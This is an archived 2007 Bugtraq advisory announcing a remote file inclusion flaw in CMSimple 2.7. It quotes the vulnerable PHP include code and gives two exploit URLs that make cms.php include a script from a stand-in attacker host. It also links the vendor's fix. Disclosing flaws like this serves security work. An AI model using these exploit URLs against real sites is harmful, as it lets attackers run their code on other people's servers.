lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Date: Sun, 21 Jan 2007 05:29:07 +0800
From: "mr alkomandoz" <k3g@...kermail.com>
To: bugtraq@...urityfocus.com
Cc: str0ke@...w0rm.com
Subject: cmsimple 2.7 Remote File Include

-----------------------------------------------

cmsimple 2.7  Remote File Include

-----------------------------------------------


Author: Alk()mand()z

-----------------------------------------------
 
Vuln Code:

if (!@ include ($pth['file']['plugin_index']))
	


{if(@include($pth['file']['image']))exit;}




-----------------------------------------------

3xplo!t:

cmsimple2_7/cmsimple/cms.php?pth['file']['config']=http://evil_scripts?


cmscmsimple2_7/cmsimple/cms.php?pth['file']['image']=http://evil_scripts?

-----------------------------------------------

download:  http://www.cmsimple.dk/?download=cmsimple2_7_fix1.zip

-----------------------------------------------


Greetz: KaBaRa, SpY0zErO, aG-SpIdEr - TOoOoFa


SpeciaL GreeTz : AsB-MaY-GrOuPs & A-S-T -Team


                 
##################################

AsB-MaY.NeT  & MoHaNdKo.CoM

##################################


-- 
_______________________________________________
Get your free email from http://www.hackermail.com

Powered by blists - more mailing lists